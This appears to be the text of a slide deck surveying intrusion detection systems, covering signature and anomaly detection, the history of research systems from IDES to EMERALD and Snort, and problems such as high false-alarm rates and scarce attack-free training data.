Survey of Intrusion Detection Systems

1
Survey of Intrusion DetectionSystems
2
Motivation

• The worldwide impact of malicious code attacks is
  estimated to be over 10 Billion annually.
• The CERT center at CMU reported 73,359 security
  incidents between 1/1/02 and 9/31/02, equal to
  all of the security incidents reported in
  2000-2001 combined.
• Novice attackers can easily acquire and use
  automated denial-of-service attack software.
• Human security analysts can't keep up with it all

3
Intrusion Detection

• Attempts to detect unauthorized or malicious
  activities in a network or on a host system
• Signature-based - looks for patterns that are
  known to be intrusive in packets or audit logs
• Anomaly-based - looks for 'abnormal' activity,
  usually requires a template of 'normal' activity
• Determining 'who' is much harder than just
  detecting that an intrusion occurred.

4
Early Work on Security

• Saltzer and Schroeder (1974) - established
  security design principals and mechanisms
• Orange Book (1985) - DoD specifications
• Formal Models
• Bell -LaPadula (1976) - supported formal proofs
  of conformance to security policies
• Denning (1987) - described the requirements for
  designing an intrusion detection system

5
Early Systems

• IDES - statistical anomaly detection
• Haystack - also added signature detection
• Wisdom Sense - automatically created a profile
  of 'normal' behavior from past user and host
  activities
• ISOA - uses both real-time monitoring and
  post-session analysis to detect suspicious
  behavior, developed profiles at both levels

6
Recent Research in ID

• NIDES - distributed collection of host data,
  centralized analysis (extension of IDES)
• NSM - network traffic monitoring for anomalous
  packets
• DIDS - combines host-based (Haystack) and network
  monitoring (NSM)
• CSM - peer-to-peer distributed analysis

7
Recent Research (continued)

• Bro - analyzes packet contents
• GrIDS - builds graphs of network activity and
  looks for anomalies
• STAT and NetSTAT - model attack with state
  machine. if accepted, attack occurred
• EMERALD - framework for building an ID system
  with distributed collection and analysis, modular
  design (extended NIDES)

8
Additional IDS Projects

• Data-mining for ID - numerous projects mining
  host audit data, captured packets
• Autonomous Agents - independent agents monitor
  specific activities/resources and report to
  hierarchy of analyzers
• Open source projects - (e.g. SHADOW and Snort) -
  performance comparable to commercial and research
  systems

9
Major Problems

• High False-Alarm Rates - real-world tests show
  overwhelming numbers of false alarms, little
  success in filtering them out
• Availability of Training Data - most
  anomaly-based ID systems need attack-free
  datasets. Currently, no clear way to create or
  certify realistic attack-free data